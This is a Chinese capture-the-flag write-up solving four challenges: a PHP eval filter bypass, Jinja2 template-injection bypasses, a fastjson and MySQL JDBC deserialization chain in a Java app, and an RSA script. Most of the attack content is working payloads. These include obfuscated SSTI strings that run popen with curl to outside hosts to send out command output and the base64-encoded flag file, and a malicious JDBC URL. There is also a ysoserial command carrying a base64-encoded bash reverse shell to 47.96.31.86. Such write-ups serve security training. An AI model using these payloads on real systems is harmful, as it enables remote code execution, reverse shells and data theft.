ezrce
<?php
highlight_file(__FILE__);
//its a babe bypass
error_reporting(0);
if (isset($_GET['rce'])) {
if (!empty($_GET['rce'])){
$printValue= strtolower($_GET['rce']);
$banned = array("cat", "more" ,"readfile", "fopen", "file_get_contents", "file", "SplFileObject" );
$special_block= "test";
$$special_block= "/flag";
foreach ($banned as $value) {
if (strpos($printValue, $value) || preg_match('/system|exec|bin2hex|assert|passthru|shell_exec|escapeshellcmd| escapeshellarg|pcntl_exec|usort|popen|flag|special_block|require|scandir|include|hex2bin|getallheaders|strrev|getallheaders|strrev|\\$[a-zA-Z]|[#!%^&*_+=\\-,\\.:`|<>?~\\\\\\\\]/i', $printValue)) {
$printValue="";
echo "<script>alert('Bad character/word ditected!');</script>";
break;
}
}
eval($printValue . ";");
}
}
?>
离谱的bypass
国外的一道原题
https://ctf.zeyu2001.com/2021/typhooncon-ctf-2021/impasse
非常巧妙的利用了变量覆盖的方法
echo+'';print(eval('return ${banned}[4](${test});'))
babyssti
看下过滤(当然不止)
https://saucer-man.com/information_security/516.html#cl-6
{{
[
空格
'
.
{% if ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://127.0.0.1:4444/?i=`whoami`').read()=='p' %}1{% endif %}
http://127.0.0.1:5000/?name={{()|attr(%22__class__%22)|attr(%22__base__%22)|attr(%22__subclasses__%22)()|attr(%22__getitem__%22)(133)|attr(%22__init__%22)|attr(%22__globals__%22)|attr(%22__getitem__%22)(%22popen%22)(%22whoami%22)|attr(%22read%22)()}}
{{()|attr("%c%c%c%c%c%c%c%c%c"|format(95,95,99,108,97,115,115,95,95))|attr("%c%c%c%c%c%c%c%c"|format(95,95,98,97,115,101,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,115,117,98,99,108,97,115,115,101,115,95,95))()|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))(133)|attr("%c%c%c%c%c%c%c%c"|format(95,95,105,110,105,116,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,108,111,98,97,108,115,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))("popen")("whoami")|attr(%22read%22)()}}
{% if ()|attr("%c%c%c%c%c%c%c%c%c"|format(95,95,99,108,97,115,115,95,95))|attr("%c%c%c%c%c%c%c%c"|format(95,95,98,97,115,101,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,115,117,98,99,108,97,115,115,101,115,95,95))()|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))(133)|attr("%c%c%c%c%c%c%c%c"|format(95,95,105,110,105,116,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,108,111,98,97,108,115,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))("popen")("curl http://boxtkv.ceye.io")|attr(%22read%22)()=="p" %}1{% endif %}
{%if()|attr(%22%c%c%c%c%c%c%c%c%c%22|format(95,95,99,108,97,115,115,95,95))|attr(%22%c%c%c%c%c%c%c%c%22|format(95,95,98,97,115,101,95,95))|attr(%22%c%c%c%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,115,117,98,99,108,97,115,115,101,115,95,95))()|attr(%22%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,103,101,116,105,116,101,109,95,95))(132)|attr(%22%c%c%c%c%c%c%c%c%22|format(95,95,105,110,105,116,95,95))|attr(%22%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,103,108,111,98,97,108,115,95,95))|attr(%22%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,103,101,116,105,116,101,109,95,95))(%22popen%22)(%22curl$IFS$9http://794828630:2333?c=`cat$IFS$9/fla""gasdcccccc|base64`%22)|attr(%22read%22)()=="p"%}1{%endif%}
过滤了蛮多的,重要的是需要自己搭个环境
flask环境和python脚本环境完全不一样的,主要卡在这里了
easy_java
把jar包还原成项目
本地搭建,审计
在admin路由这里可以自定义jdbc的参数,而jdbc存在反序列化
第一步,admin伪造绕过
在register路由这里
只要匹配到{username},就会替换
https://wx.zsxq.com/dweb2/index/topic_detail/182585211588122
而p神的知识星球说明了fastjson支持注释,利用注释饶过正则匹配
http://127.0.0.1/register?user=%7B%22username%22%3A%2F*penson*%2F%22admin%22%2C%22password%22%3A%22guess%22%7D
把admin注进去
登录拿session进admin
接着就是jdbc反序列化
看到jdbc版本是8的
https://www.mi1k7ea.com/2021/04/23/MySQL-JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/
jdbc:mysql://47.96.31.86:7700/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4zMS44Ni8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}"
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4zMS44Ni8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}
easy_rsa
羊城杯的原题
[羊城杯 2020]Power
抄脚本改一下
import sympy
import gmpy2
from Crypto.Util.number import getPrime , long_to_bytes
x = 4081589335861545789835900064099635357096399307337433897589803884626402434977432990016139226375481290410727489054239869962196583881117103323966736211566475539446678319618093115175112507069500173061215448325773249332796885624377362206444530510862480133054015065963334293387568286441905700716121965839808869357354006128877042545439515369257271569914721144973246451659098340370835404858757446411467741537214371880806558890311566169561294743201198192296369009590146133590
c=25562696992733536309182393779981779194240154099429561071032280334763645594896471389578060860342401623942484948987716140390982592619521666792424752334479246961649746061040166020085170757237115563084113762532741403917411315342519136738879919867100264184573200481028092895743894796816962164203221470918044930335749213176218455777516922130048195365976773635904361747281900075574599122502341481491609282116651135302435182241327211649334973233884028113185901584769019028117675925853042867198133957188908318016744666365319241377018102421574351449756122789387653293735302629918910002538784361049010374950779639892697081213057
dp=5260952459703133229911581653786151165351615592380635657675026312493642098695058018540694433892583077117305420684484097529438374197142471836138466810277803
p = sympy.symbols("p")
a = sympy.solve([2021*p**3 + 2020 + 2019*p**2-x],[p])
# print(a)
p=12640211216466775763050017481547933750912814131973813802729339716313957628118122130773233534260300514170797571411776745968647678621480594520108761936619731
m = pow(c,dp,p)
print(long_to_bytes(m))
